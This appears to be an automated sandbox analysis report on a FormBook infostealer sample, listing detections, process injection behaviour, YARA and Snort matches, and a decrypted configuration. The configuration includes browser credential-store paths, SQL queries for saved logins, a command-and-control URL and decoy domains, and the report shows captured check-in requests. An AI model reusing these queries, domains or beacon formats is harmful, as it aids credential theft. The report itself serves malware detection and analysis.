Loading ...

Play interactive tourEdit tour

Analysis Report JdtN8nIcLi8RQOi.exe

Overview

General Information

Sample Name:JdtN8nIcLi8RQOi.exe
Analysis ID:339360
MD5:aee550440966b0bd34d9ccb2b1f7f146
SHA1:14125d61fbcf4b63cb9c9ad82a60be3ad9aa2a3d
SHA256:d31340f14a66b43a1f5cf461cf48278bb97bfc33ef5a8bd0b29d0a3e6f315895
Tags:exeFormbookOutlook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • JdtN8nIcLi8RQOi.exe (PID: 6596 cmdline: 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe' MD5: AEE550440966B0BD34D9CCB2B1F7F146)
    • JdtN8nIcLi8RQOi.exe (PID: 5756 cmdline: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe MD5: AEE550440966B0BD34D9CCB2B1F7F146)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 4832 cmdline: /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79dc", "KEY1_OFFSET 0x1bb1e", "CONFIG SIZE : 0xb5", "CONFIG OFFSET 0x1bc1e", "URL SIZE : 22", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xc41a2362", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715032", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd013cd", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "philippebrooksdesign.com", "cmoorestudio.com", "profille-sarina23tammara.club", "dqulxe.com", "uiffinger.com", "nolarapper.com", "maconanimalexterminator.com", "bisovka.com", "loveisloveent.com", "datication.com", "spxo66.com", "drhelpnow.com", "ladybug-cle.com", "macocome.com", "thepoppysocks.com", "eldritchparadox.com", "mercadolibre.company", "ismartfarm.com", "kansascarlot.com", "kevinld.com", "p87mbu2ss.xyz", "the-makery.info", "untegoro.site", "newyorkcityhemorrhoidcenter.com", "crystalclearwholistics.com", "iregentos.info", "fullskis.com", "promanconsortium.com", "800029120.com", "mummyisme.com", "humpychocks.com", "myfavestuff.store", "naturalfemina.com", "bimetalthermostatksd.com", "draysehaniminciftligi.com", "sf9820.com", "4thop.com", "24les.com", "thepupcrew.com", "strangephobias.com", "hotmamabody.com", "restaurantsilhouette.com", "texasadultdayservices.com", "binahaiat.com", "nipseythegreat.com", "pelisplusxd.net", "mamborio.com", "elitedigitalperformance.com", "therileyretreat.com", "aieqbgk.icu", "corkboardit.net", "katieberiont.com", "telemedicinehamilton.com", "imagistor.com", "tekdesignltd.com", "bmw-7979.com", "animaliaartist.com", "straightlineautoserviceerie.net", "qoo10online.com", "tesseracoffee.com", "central-car-sales.com", "thecleaningenthusiast.com", "musicmercch.com", "pearlpham.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.allismd.com/ur06/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x166a9:$sqlite3step: 68 34 1C 7B E1
      • 0x167bc:$sqlite3step: 68 34 1C 7B E1
      • 0x166d8:$sqlite3text: 68 38 2A 90 C5
      • 0x167fd:$sqlite3text: 68 38 2A 90 C5
      • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
      00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x158a9:$sqlite3step: 68 34 1C 7B E1
          • 0x159bc:$sqlite3step: 68 34 1C 7B E1
          • 0x158d8:$sqlite3text: 68 38 2A 90 C5
          • 0x159fd:$sqlite3text: 68 38 2A 90 C5
          • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
          1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79dc", "KEY1_OFFSET 0x1bb1e", "CONFIG SIZE : 0xb5", "CONFIG OFFSET 0x1bc1e", "URL SIZE : 22", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xc41a2362", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715032", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd013cd", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
            Multi AV Scanner detection for submitted fileShow sources
            Source: JdtN8nIcLi8RQOi.exeReversingLabs: Detection: 21%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for sampleShow sources
            Source: JdtN8nIcLi8RQOi.exeJoe Sandbox ML: detected
            Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
            Source: JdtN8nIcLi8RQOi.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: WWAHost.pdb source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: WWAHost.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.715992028.000000000122F000.00000040.00000001.sdmp, WWAHost.exe, 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: JdtN8nIcLi8RQOi.exe, WWAHost.exe
            Source: Binary string: mscorrc.pdb source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_01BAD530
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_01BAD520

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.maconanimalexterminator.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8 HTTP/1.1Host: www.pelisplusxd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.allismd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.central-car-sales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO HTTP/1.1Host: www.nolarapper.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe HTTP/1.1Host: www.promanconsortium.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf HTTP/1.1Host: www.profille-sarina23tammara.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.restaurantsilhouette.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1Host: www.bimetalthermostatksd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.straightlineautoserviceerie.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1Host: www.cmoorestudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1Host: www.eldritchparadox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 192.185.0.218 192.185.0.218
            Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
